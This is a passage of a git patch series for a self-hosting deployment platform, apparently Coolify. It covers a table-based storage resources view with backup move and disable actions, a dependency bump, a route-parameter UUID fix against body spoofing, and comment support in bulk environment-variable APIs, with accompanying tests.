+            } elseif ($database) {
+                $environment = $database->environment;
+                $project = $environment?->project;
+                if ($project && $environment) {
+                    $resourceLink = route('project.database.backup.index', [
+                        'project_uuid' => $project->uuid,
+                        'environment_uuid' => $environment->uuid,
+                        'database_uuid' => $database->uuid,
+                    ]);
+                    $backupParams = [
+                        'project_uuid' => $project->uuid,
+                        'environment_uuid' => $environment->uuid,
+                        'database_uuid' => $database->uuid,
+                    ];
+                }
+            }
+        @endphp
+        <div class="pb-6">
+            <div class="flex items-center gap-2 pb-2">
+                @if ($resourceLink)
+                    <a {{ wireNavigate() }} href="{{ $resourceLink }}" class="text-lg font-bold dark:text-white hover:underline">{{ $databaseName }}</a>
+                @else
+                    <span class="text-lg font-bold dark:text-white">{{ $databaseName }}</span>
+                @endif
             </div>
-        @endforelse
-    </div>
+            <div class="grid gap-4 lg:grid-cols-2">
+                @foreach ($backups as $backup)
+                    @php
+                        $backupLink = null;
+                        if ($backupParams) {
+                            $backupLink = route('project.database.backup.execution', array_merge($backupParams, [
+                                'backup_uuid' => $backup->uuid,
+                            ]));
+                        }
+                    @endphp
+                    @if ($backupLink)
+                        <a {{ wireNavigate() }} href="{{ $backupLink }}" @class(['gap-2 border cursor-pointer coolbox group'])>
+                    @else
+                        <div @class(['gap-2 border coolbox'])>
+                    @endif
+                        <div class="flex flex-col justify-center mx-6">
+                            <div class="box-title">{{ $backup->frequency }}</div>
+                            @if (!$backup->enabled)
+                                <span class="px-2 py-1 text-xs font-semibold text-yellow-800 bg-yellow-100 rounded dark:text-yellow-100 dark:bg-yellow-800 w-fit">
+                                    Disabled
+                                </span>
+                            @endif
+                        </div>
+                    @if ($backupLink)
+                        </a>
+                    @else
+                        </div>
+                    @endif
+                @endforeach
+            </div>
+        </div>
+    @empty
+        <div>No backup schedules are using this storage.</div>
+    @endforelse
 </div>
diff --git a/resources/views/livewire/storage/show.blade.php b/resources/views/livewire/storage/show.blade.php
index e54de37f3..0d580486e 100644
--- a/resources/views/livewire/storage/show.blade.php
+++ b/resources/views/livewire/storage/show.blade.php
@@ -46,7 +46,7 @@
     @if ($currentRoute === 'storage.show')
         <livewire:storage.form :storage="$storage" />
     @elseif ($currentRoute === 'storage.resources')
-        <livewire:storage.resources :storage="$storage" />
+        <livewire:storage.resources :storage="$storage" :key="'resources-'.uniqid()" />
     @endif
     </div>
 </div>

From ce5e736b00d493ab2863b3ab666d50d8a8c1e0e8 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 19 Mar 2026 12:48:52 +0100
Subject: [PATCH 089/213] feat(storage): add storage management for backup
 schedules

Add ability to move backups between S3 storages and disable S3 backups.
Refactor storage resources view from cards to table layout with search
functionality and storage selection dropdowns.
---
 app/Livewire/Storage/Resources.php            |  60 ++++++
 resources/css/app.css                         |   2 +-
 .../livewire/storage/resources.blade.php      | 182 ++++++++++--------
 3 files changed, 165 insertions(+), 79 deletions(-)

diff --git a/app/Livewire/Storage/Resources.php b/app/Livewire/Storage/Resources.php
index 30ac67066..643ecb3eb 100644
--- a/app/Livewire/Storage/Resources.php
+++ b/app/Livewire/Storage/Resources.php
@@ -10,6 +10,61 @@ class Resources extends Component
 {
     public S3Storage $storage;
 
+    public array $selectedStorages = [];
+
+    public function mount(): void
+    {
+        $backups = ScheduledDatabaseBackup::where('s3_storage_id', $this->storage->id)
+            ->where('save_s3', true)
+            ->get();
+
+        foreach ($backups as $backup) {
+            $this->selectedStorages[$backup->id] = $this->storage->id;
+        }
+    }
+
+    public function disableS3(int $backupId): void
+    {
+        $backup = ScheduledDatabaseBackup::findOrFail($backupId);
+
+        $backup->update([
+            'save_s3' => false,
+            's3_storage_id' => null,
+        ]);
+
+        unset($this->selectedStorages[$backupId]);
+
+        $this->dispatch('success', 'S3 disabled.', 'S3 backup has been disabled for this schedule.');
+    }
+
+    public function moveBackup(int $backupId): void
+    {
+        $backup = ScheduledDatabaseBackup::findOrFail($backupId);
+        $newStorageId = $this->selectedStorages[$backupId] ?? null;
+
+        if (! $newStorageId || (int) $newStorageId === $this->storage->id) {
+            $this->dispatch('error', 'No change.', 'The backup is already using this storage.');
+
+            return;
+        }
+
+        $newStorage = S3Storage::where('id', $newStorageId)
+            ->where('team_id', $this->storage->team_id)
+            ->first();
+
+        if (! $newStorage) {
+            $this->dispatch('error', 'Storage not found.');
+
+            return;
+        }
+
+        $backup->update(['s3_storage_id' => $newStorage->id]);
+
+        unset($this->selectedStorages[$backupId]);
+
+        $this->dispatch('success', 'Backup moved.', "Moved to {$newStorage->name}.");
+    }
+
     public function render()
     {
         $backups = ScheduledDatabaseBackup::where('s3_storage_id', $this->storage->id)
@@ -18,8 +73,13 @@ public function render()
             ->get()
             ->groupBy(fn ($backup) => $backup->database_type.'-'.$backup->database_id);
 
+        $allStorages = S3Storage::where('team_id', $this->storage->team_id)
+            ->orderBy('name')
+            ->get(['id', 'name', 'is_usable']);
+
         return view('livewire.storage.resources', [
             'groupedBackups' => $backups,
+            'allStorages' => $allStorages,
         ]);
     }
 }
diff --git a/resources/css/app.css b/resources/css/app.css
index eeba1ee01..3cfa03dae 100644
--- a/resources/css/app.css
+++ b/resources/css/app.css
@@ -163,7 +163,7 @@ tbody {
 }
 
 tr {
-    @apply text-black dark:text-neutral-400 dark:hover:bg-black hover:bg-neutral-200;
+    @apply text-black dark:text-neutral-400 dark:hover:bg-coolgray-300 hover:bg-neutral-100;
 }
 
 tr th {
diff --git a/resources/views/livewire/storage/resources.blade.php b/resources/views/livewire/storage/resources.blade.php
index 4fdef1e4b..481e7ccab 100644
--- a/resources/views/livewire/storage/resources.blade.php
+++ b/resources/views/livewire/storage/resources.blade.php
@@ -1,81 +1,107 @@
-<div>
-    @forelse ($groupedBackups as $backups)
-        @php
-            $firstBackup = $backups->first();
-            $database = $firstBackup->database;
-            $databaseName = $database?->name ?? 'Deleted database';
-            $resourceLink = null;
-            $backupParams = null;
-            if ($database && $database instanceof \App\Models\ServiceDatabase) {
-                $service = $database->service;
-                if ($service) {
-                    $environment = $service->environment;
-                    $project = $environment?->project;
-                    if ($project && $environment) {
-                        $resourceLink = route('project.service.configuration', [
-                            'project_uuid' => $project->uuid,
-                            'environment_uuid' => $environment->uuid,
-                            'service_uuid' => $service->uuid,
-                        ]);
-                    }
-                }
-            } elseif ($database) {
-                $environment = $database->environment;
-                $project = $environment?->project;
-                if ($project && $environment) {
-                    $resourceLink = route('project.database.backup.index', [
-                        'project_uuid' => $project->uuid,
-                        'environment_uuid' => $environment->uuid,
-                        'database_uuid' => $database->uuid,
-                    ]);
-                    $backupParams = [
-                        'project_uuid' => $project->uuid,
-                        'environment_uuid' => $environment->uuid,
-                        'database_uuid' => $database->uuid,
-                    ];
-                }
-            }
-        @endphp
-        <div class="pb-6">
-            <div class="flex items-center gap-2 pb-2">
-                @if ($resourceLink)
-                    <a {{ wireNavigate() }} href="{{ $resourceLink }}" class="text-lg font-bold dark:text-white hover:underline">{{ $databaseName }}</a>
-                @else
-                    <span class="text-lg font-bold dark:text-white">{{ $databaseName }}</span>
-                @endif
-            </div>
-            <div class="grid gap-4 lg:grid-cols-2">
-                @foreach ($backups as $backup)
-                    @php
-                        $backupLink = null;
-                        if ($backupParams) {
-                            $backupLink = route('project.database.backup.execution', array_merge($backupParams, [
-                                'backup_uuid' => $backup->uuid,
-                            ]));
-                        }
-                    @endphp
-                    @if ($backupLink)
-                        <a {{ wireNavigate() }} href="{{ $backupLink }}" @class(['gap-2 border cursor-pointer coolbox group'])>
-                    @else
-                        <div @class(['gap-2 border coolbox'])>
-                    @endif
-                        <div class="flex flex-col justify-center mx-6">
-                            <div class="box-title">{{ $backup->frequency }}</div>
-                            @if (!$backup->enabled)
-                                <span class="px-2 py-1 text-xs font-semibold text-yellow-800 bg-yellow-100 rounded dark:text-yellow-100 dark:bg-yellow-800 w-fit">
-                                    Disabled
-                                </span>
-                            @endif
-                        </div>
-                    @if ($backupLink)
-                        </a>
-                    @else
-                        </div>
-                    @endif
-                @endforeach
+<div x-data="{ search: '' }">
+    <x-forms.input placeholder="Search resources..." x-model="search" id="null" />
+    @if ($groupedBackups->count() > 0)
+        <div class="overflow-x-auto pt-4">
+            <div class="inline-block min-w-full">
+                <div class="overflow-hidden">
+                    <table class="min-w-full">
+                        <thead>
+                            <tr>
+                                <th class="px-5 py-3 text-xs font-medium text-left uppercase">Database</th>
+                                <th class="px-5 py-3 text-xs font-medium text-left uppercase">Frequency</th>
+                                <th class="px-5 py-3 text-xs font-medium text-left uppercase">Status</th>
+                                <th class="px-5 py-3 text-xs font-medium text-left uppercase">S3 Storage</th>
+                            </tr>
+                        </thead>
+                        <tbody>
+                            @foreach ($groupedBackups as $backups)
+                                @php
+                                    $firstBackup = $backups->first();
+                                    $database = $firstBackup->database;
+                                    $databaseName = $database?->name ?? 'Deleted database';
+                                    $resourceLink = null;
+                                    $backupParams = null;
+                                    if ($database && $database instanceof \App\Models\ServiceDatabase) {
+                                        $service = $database->service;
+                                        if ($service) {
+                                            $environment = $service->environment;
+                                            $project = $environment?->project;
+                                            if ($project && $environment) {
+                                                $resourceLink = route('project.service.configuration', [
+                                                    'project_uuid' => $project->uuid,
+                                                    'environment_uuid' => $environment->uuid,
+                                                    'service_uuid' => $service->uuid,
+                                                ]);
+                                            }
+                                        }
+                                    } elseif ($database) {
+                                        $environment = $database->environment;
+                                        $project = $environment?->project;
+                                        if ($project && $environment) {
+                                            $resourceLink = route('project.database.backup.index', [
+                                                'project_uuid' => $project->uuid,
+                                                'environment_uuid' => $environment->uuid,
+                                                'database_uuid' => $database->uuid,
+                                            ]);
+                                            $backupParams = [
+                                                'project_uuid' => $project->uuid,
+                                                'environment_uuid' => $environment->uuid,
+                                                'database_uuid' => $database->uuid,
+                                            ];
+                                        }
+                                    }
+                                @endphp
+                                @foreach ($backups as $backup)
+                                    <tr class="dark:hover:bg-coolgray-300 hover:bg-neutral-100" x-show="search === '' || '{{ strtolower(addslashes($databaseName)) }}'.includes(search.toLowerCase()) || '{{ strtolower(addslashes($backup->frequency)) }}'.includes(search.toLowerCase())">
+                                        <td class="px-5 py-4 text-sm whitespace-nowrap">
+                                            @if ($resourceLink)
+                                                <a class="hover:underline" {{ wireNavigate() }} href="{{ $resourceLink }}">{{ $databaseName }} <x-internal-link /></a>
+                                            @else
+                                                {{ $databaseName }}
+                                            @endif
+                                        </td>
+                                        <td class="px-5 py-4 text-sm whitespace-nowrap">
+                                            @php
+                                                $backupLink = null;
+                                                if ($backupParams) {
+                                                    $backupLink = route('project.database.backup.execution', array_merge($backupParams, [
+                                                        'backup_uuid' => $backup->uuid,
+                                                    ]));
+                                                }
+                                            @endphp
+                                            @if ($backupLink)
+                                                <a class="hover:underline" {{ wireNavigate() }} href="{{ $backupLink }}">{{ $backup->frequency }} <x-internal-link /></a>
+                                            @else
+                                                {{ $backup->frequency }}
+                                            @endif
+                                        </td>
+                                        <td class="px-5 py-4 text-sm font-medium whitespace-nowrap">
+                                            @if ($backup->enabled)
+                                                <span class="text-green-500">Enabled</span>
+                                            @else
+                                                <span class="text-yellow-500">Disabled</span>
+                                            @endif
+                                        </td>
+                                        <td class="px-5 py-4 text-sm whitespace-nowrap">
+                                            <div class="flex items-center gap-2">
+                                                <select wire:model="selectedStorages.{{ $backup->id }}" class="w-full input">
+                                                    @foreach ($allStorages as $s3)
+                                                        <option value="{{ $s3->id }}" @disabled(!$s3->is_usable)>{{ $s3->name }}@if (!$s3->is_usable) (unusable)@endif</option>
+                                                    @endforeach
+                                                </select>
+                                                <x-forms.button wire:click="moveBackup({{ $backup->id }})">Save</x-forms.button>
+                                                <x-forms.button isError wire:click="disableS3({{ $backup->id }})" wire:confirm="Are you sure you want to disable S3 for this backup schedule?">Disable S3</x-forms.button>
+                                            </div>
+                                        </td>
+                                    </tr>
+                                @endforeach
+                            @endforeach
+                        </tbody>
+                    </table>
+                </div>
             </div>
         </div>
-    @empty
-        <div>No backup schedules are using this storage.</div>
-    @endforelse
+    @else
+        <div class="pt-4">No backup schedules are using this storage.</div>
+    @endif
 </div>

From 0627dce4da77e6165d780cf61773243cfa9ad60c Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 19 Mar 2026 17:15:02 +0000
Subject: [PATCH 090/213] build(deps): bump phpseclib/phpseclib from 3.0.49 to
 3.0.50

Bumps [phpseclib/phpseclib](https://github.com/phpseclib/phpseclib) from 3.0.49 to 3.0.50.
- [Release notes](https://github.com/phpseclib/phpseclib/releases)
- [Changelog](https://github.com/phpseclib/phpseclib/blob/master/CHANGELOG.md)
- [Commits](https://github.com/phpseclib/phpseclib/compare/3.0.49...3.0.50)

---
updated-dependencies:
- dependency-name: phpseclib/phpseclib
  dependency-version: 3.0.50
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 composer.lock | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/composer.lock b/composer.lock
index 993835a42..3b1f4eded 100644
--- a/composer.lock
+++ b/composer.lock
@@ -5061,16 +5061,16 @@
         },
         {
             "name": "phpseclib/phpseclib",
-            "version": "3.0.49",
+            "version": "3.0.50",
             "source": {
                 "type": "git",
                 "url": "https://github.com/phpseclib/phpseclib.git",
-                "reference": "6233a1e12584754e6b5daa69fe1289b47775c1b9"
+                "reference": "aa6ad8321ed103dc3624fb600a25b66ebf78ec7b"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/phpseclib/phpseclib/zipball/6233a1e12584754e6b5daa69fe1289b47775c1b9",
-                "reference": "6233a1e12584754e6b5daa69fe1289b47775c1b9",
+                "url": "https://api.github.com/repos/phpseclib/phpseclib/zipball/aa6ad8321ed103dc3624fb600a25b66ebf78ec7b",
+                "reference": "aa6ad8321ed103dc3624fb600a25b66ebf78ec7b",
                 "shasum": ""
             },
             "require": {
@@ -5151,7 +5151,7 @@
             ],
             "support": {
                 "issues": "https://github.com/phpseclib/phpseclib/issues",
-                "source": "https://github.com/phpseclib/phpseclib/tree/3.0.49"
+                "source": "https://github.com/phpseclib/phpseclib/tree/3.0.50"
             },
             "funding": [
                 {
@@ -5167,7 +5167,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-01-27T09:17:28+00:00"
+            "time": "2026-03-19T02:57:58+00:00"
         },
         {
             "name": "phpstan/phpdoc-parser",

From 8a164735cb3bb046aa8d5a10e3f6d077bd961dce Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 19 Mar 2026 21:56:58 +0100
Subject: [PATCH 091/213] fix(api): extract resource UUIDs from route
 parameters

Extract resource UUIDs from route parameters instead of request body
in ApplicationsController and ServicesController environment variable
endpoints. This prevents UUID parameters from being spoofed in the
request body.

- Replace $request->uuid with $request->route('uuid')
- Replace $request->env_uuid with $request->route('env_uuid')
- Add tests verifying route parameters are used and body UUIDs ignored
---
 .../Api/ApplicationsController.php            | 10 +--
 .../Controllers/Api/ServicesController.php    | 10 +--
 .../EnvironmentVariableUpdateApiTest.php      | 62 ++++++++++++++++++-
 3 files changed, 71 insertions(+), 11 deletions(-)

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 6f34b43bf..5819441b7 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -2957,7 +2957,7 @@ public function update_env_by_uuid(Request $request)
         if ($return instanceof \Illuminate\Http\JsonResponse) {
             return $return;
         }
-        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->route('uuid'))->first();
 
         if (! $application) {
             return response()->json([
@@ -3158,7 +3158,7 @@ public function create_bulk_envs(Request $request)
         if ($return instanceof \Illuminate\Http\JsonResponse) {
             return $return;
         }
-        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->route('uuid'))->first();
 
         if (! $application) {
             return response()->json([
@@ -3352,7 +3352,7 @@ public function create_env(Request $request)
         if (is_null($teamId)) {
             return invalidTokenResponse();
         }
-        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->route('uuid'))->first();
 
         if (! $application) {
             return response()->json([
@@ -3509,7 +3509,7 @@ public function delete_env_by_uuid(Request $request)
         if (is_null($teamId)) {
             return invalidTokenResponse();
         }
-        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->route('uuid'))->first();
 
         if (! $application) {
             return response()->json([
@@ -3519,7 +3519,7 @@ public function delete_env_by_uuid(Request $request)
 
         $this->authorize('manageEnvironment', $application);
 
-        $found_env = EnvironmentVariable::where('uuid', $request->env_uuid)
+        $found_env = EnvironmentVariable::where('uuid', $request->route('env_uuid'))
             ->where('resourceable_type', Application::class)
             ->where('resourceable_id', $application->id)
             ->first();
diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php
index 32097443e..de504c1a4 100644
--- a/app/Http/Controllers/Api/ServicesController.php
+++ b/app/Http/Controllers/Api/ServicesController.php
@@ -1207,7 +1207,7 @@ public function update_env_by_uuid(Request $request)
             return invalidTokenResponse();
         }
 
-        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->uuid)->first();
+        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->route('uuid'))->first();
         if (! $service) {
             return response()->json(['message' => 'Service not found.'], 404);
         }
@@ -1342,7 +1342,7 @@ public function create_bulk_envs(Request $request)
             return invalidTokenResponse();
         }
 
-        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->uuid)->first();
+        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->route('uuid'))->first();
         if (! $service) {
             return response()->json(['message' => 'Service not found.'], 404);
         }
@@ -1461,7 +1461,7 @@ public function create_env(Request $request)
             return invalidTokenResponse();
         }
 
-        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->uuid)->first();
+        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->route('uuid'))->first();
         if (! $service) {
             return response()->json(['message' => 'Service not found.'], 404);
         }
@@ -1570,14 +1570,14 @@ public function delete_env_by_uuid(Request $request)
             return invalidTokenResponse();
         }
 
-        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->uuid)->first();
+        $service = Service::whereRelation('environment.project.team', 'id', $teamId)->whereUuid($request->route('uuid'))->first();
         if (! $service) {
             return response()->json(['message' => 'Service not found.'], 404);
         }
 
         $this->authorize('manageEnvironment', $service);
 
-        $env = EnvironmentVariable::where('uuid', $request->env_uuid)
+        $env = EnvironmentVariable::where('uuid', $request->route('env_uuid'))
             ->where('resourceable_type', Service::class)
             ->where('resourceable_id', $service->id)
             ->first();
diff --git a/tests/Feature/EnvironmentVariableUpdateApiTest.php b/tests/Feature/EnvironmentVariableUpdateApiTest.php
index 9c45dc5ae..1ff528bbf 100644
--- a/tests/Feature/EnvironmentVariableUpdateApiTest.php
+++ b/tests/Feature/EnvironmentVariableUpdateApiTest.php
@@ -3,6 +3,7 @@
 use App\Models\Application;
 use App\Models\Environment;
 use App\Models\EnvironmentVariable;
+use App\Models\InstanceSettings;
 use App\Models\Project;
 use App\Models\Server;
 use App\Models\Service;
@@ -14,6 +15,8 @@
 uses(RefreshDatabase::class);
 
 beforeEach(function () {
+    InstanceSettings::updateOrCreate(['id' => 0]);
+
     $this->team = Team::factory()->create();
     $this->user = User::factory()->create();
     $this->team->members()->attach($this->user->id, ['role' => 'owner']);
@@ -24,7 +27,7 @@
     $this->bearerToken = $this->token->plainTextToken;
 
     $this->server = Server::factory()->create(['team_id' => $this->team->id]);
-    $this->destination = StandaloneDocker::factory()->create(['server_id' => $this->server->id]);
+    $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
     $this->project = Project::factory()->create(['team_id' => $this->team->id]);
     $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
 });
@@ -117,6 +120,35 @@
 
         $response->assertStatus(422);
     });
+
+    test('uses route uuid and ignores uuid in request body', function () {
+        $service = Service::factory()->create([
+            'server_id' => $this->server->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+            'environment_id' => $this->environment->id,
+        ]);
+
+        EnvironmentVariable::create([
+            'key' => 'TEST_KEY',
+            'value' => 'old-value',
+            'resourceable_type' => Service::class,
+            'resourceable_id' => $service->id,
+            'is_preview' => false,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/services/{$service->uuid}/envs", [
+            'key' => 'TEST_KEY',
+            'value' => 'new-value',
+            'uuid' => 'bogus-uuid-from-body',
+        ]);
+
+        $response->assertStatus(201);
+        $response->assertJsonFragment(['key' => 'TEST_KEY']);
+    });
 });
 
 describe('PATCH /api/v1/applications/{uuid}/envs', function () {
@@ -191,4 +223,32 @@
 
         $response->assertStatus(422);
     });
+
+    test('rejects unknown fields in request body', function () {
+        $application = Application::factory()->create([
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        EnvironmentVariable::create([
+            'key' => 'TEST_KEY',
+            'value' => 'old-value',
+            'resourceable_type' => Application::class,
+            'resourceable_id' => $application->id,
+            'is_preview' => false,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/applications/{$application->uuid}/envs", [
+            'key' => 'TEST_KEY',
+            'value' => 'new-value',
+            'uuid' => 'bogus-uuid-from-body',
+        ]);
+
+        $response->assertStatus(422);
+        $response->assertJsonFragment(['uuid' => ['This field is not allowed.']]);
+    });
 });

From fb76b68c0822df5616320d8fbc8624fd0d8b3d17 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 19 Mar 2026 22:17:55 +0100
Subject: [PATCH 092/213] feat(api): support comments in bulk environment
 variable endpoints

Add support for optional comment field on environment variables created or
updated through the bulk API endpoints. Comments are validated to a maximum
of 256 characters and are nullable. Updates preserve existing comments when
not provided in the request.
---
 .../Api/ApplicationsController.php            |  11 +-
 .../Controllers/Api/ServicesController.php    |   1 +
 .../EnvironmentVariableBulkCommentApiTest.php | 244 ++++++++++++++++++
 3 files changed, 255 insertions(+), 1 deletion(-)
 create mode 100644 tests/Feature/EnvironmentVariableBulkCommentApiTest.php

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 5819441b7..3444f9f14 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -3175,7 +3175,7 @@ public function create_bulk_envs(Request $request)
             ], 400);
         }
         $bulk_data = collect($bulk_data)->map(function ($item) {
-            return collect($item)->only(['key', 'value', 'is_preview', 'is_literal', 'is_multiline', 'is_shown_once', 'is_runtime', 'is_buildtime']);
+            return collect($item)->only(['key', 'value', 'is_preview', 'is_literal', 'is_multiline', 'is_shown_once', 'is_runtime', 'is_buildtime', 'comment']);
         });
         $returnedEnvs = collect();
         foreach ($bulk_data as $item) {
@@ -3188,6 +3188,7 @@ public function create_bulk_envs(Request $request)
                 'is_shown_once' => 'boolean',
                 'is_runtime' => 'boolean',
                 'is_buildtime' => 'boolean',
+                'comment' => 'string|nullable|max:256',
             ]);
             if ($validator->fails()) {
                 return response()->json([
@@ -3220,6 +3221,9 @@ public function create_bulk_envs(Request $request)
                     if ($item->has('is_buildtime') && $env->is_buildtime != $item->get('is_buildtime')) {
                         $env->is_buildtime = $item->get('is_buildtime');
                     }
+                    if ($item->has('comment') && $env->comment != $item->get('comment')) {
+                        $env->comment = $item->get('comment');
+                    }
                     $env->save();
                 } else {
                     $env = $application->environment_variables()->create([
@@ -3231,6 +3235,7 @@ public function create_bulk_envs(Request $request)
                         'is_shown_once' => $is_shown_once,
                         'is_runtime' => $item->get('is_runtime', true),
                         'is_buildtime' => $item->get('is_buildtime', true),
+                        'comment' => $item->get('comment'),
                         'resourceable_type' => get_class($application),
                         'resourceable_id' => $application->id,
                     ]);
@@ -3254,6 +3259,9 @@ public function create_bulk_envs(Request $request)
                     if ($item->has('is_buildtime') && $env->is_buildtime != $item->get('is_buildtime')) {
                         $env->is_buildtime = $item->get('is_buildtime');
                     }
+                    if ($item->has('comment') && $env->comment != $item->get('comment')) {
+                        $env->comment = $item->get('comment');
+                    }
                     $env->save();
                 } else {
                     $env = $application->environment_variables()->create([
@@ -3265,6 +3273,7 @@ public function create_bulk_envs(Request $request)
                         'is_shown_once' => $is_shown_once,
                         'is_runtime' => $item->get('is_runtime', true),
                         'is_buildtime' => $item->get('is_buildtime', true),
+                        'comment' => $item->get('comment'),
                         'resourceable_type' => get_class($application),
                         'resourceable_id' => $application->id,
                     ]);
diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php
index de504c1a4..4caee26dd 100644
--- a/app/Http/Controllers/Api/ServicesController.php
+++ b/app/Http/Controllers/Api/ServicesController.php
@@ -1362,6 +1362,7 @@ public function create_bulk_envs(Request $request)
                 'is_literal' => 'boolean',
                 'is_multiline' => 'boolean',
                 'is_shown_once' => 'boolean',
+                'comment' => 'string|nullable|max:256',
             ]);
 
             if ($validator->fails()) {
diff --git a/tests/Feature/EnvironmentVariableBulkCommentApiTest.php b/tests/Feature/EnvironmentVariableBulkCommentApiTest.php
new file mode 100644
index 000000000..f038ad682
--- /dev/null
+++ b/tests/Feature/EnvironmentVariableBulkCommentApiTest.php
@@ -0,0 +1,244 @@
+<?php
+
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\EnvironmentVariable;
+use App\Models\InstanceSettings;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\Service;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    InstanceSettings::updateOrCreate(['id' => 0]);
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    session(['currentTeam' => $this->team]);
+
+    $this->token = $this->user->createToken('test-token', ['*']);
+    $this->bearerToken = $this->token->plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::where('server_id', $this->server->id)->first();
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+describe('PATCH /api/v1/applications/{uuid}/envs/bulk', function () {
+    test('creates environment variables with comments', function () {
+        $application = Application::factory()->create([
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/applications/{$application->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'DB_HOST',
+                    'value' => 'localhost',
+                    'comment' => 'Database host for production',
+                ],
+                [
+                    'key' => 'DB_PORT',
+                    'value' => '5432',
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(201);
+
+        $envWithComment = EnvironmentVariable::where('key', 'DB_HOST')
+            ->where('resourceable_id', $application->id)
+            ->where('is_preview', false)
+            ->first();
+
+        $envWithoutComment = EnvironmentVariable::where('key', 'DB_PORT')
+            ->where('resourceable_id', $application->id)
+            ->where('is_preview', false)
+            ->first();
+
+        expect($envWithComment->comment)->toBe('Database host for production');
+        expect($envWithoutComment->comment)->toBeNull();
+    });
+
+    test('updates existing environment variable comment', function () {
+        $application = Application::factory()->create([
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        EnvironmentVariable::create([
+            'key' => 'API_KEY',
+            'value' => 'old-key',
+            'comment' => 'Old comment',
+            'resourceable_type' => Application::class,
+            'resourceable_id' => $application->id,
+            'is_preview' => false,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+            'Content-Type' => 'application/json',
+        ])->patchJson("/api/v1/applications/{$application->uuid}/envs/bulk", [
+            'data' => [
+                [
+                    'key' => 'API_KEY',
+                    'value' => 'new-key',
+                    'comment' => 'Updated comment',
+                ],
+            ],
+        ]);
+
+        $response->assertStatus(201);
+
+        $env = EnvironmentVariable::where('key', 'API_KEY')
+            ->where('resourceable_id', $application->id)
+            ->where('is_preview', false)
+            ->first();
+
+        expect($env->value)->toBe('new-key');
+        expect($env->comment)->toBe('Updated comment');
+    });
+
+    test('preserves existing comment when not provided in bulk update', function () {
+        $application = Application::factory()->create([
+            'environment_id' => $this->environment->id,
+            'destination_id' => $this->destination->id,
+            'destination_type' => $this->destination->getMorphClass(),
+        ]);
+
+        EnvironmentVariable::create([
+            'key' => 'SECRET',
+            'value' => 'old-secret',
+            'comment' => 'Keep this comment',
+            'resourceable_type' => Application::class,
+            'resourceable_id' => $application->id,
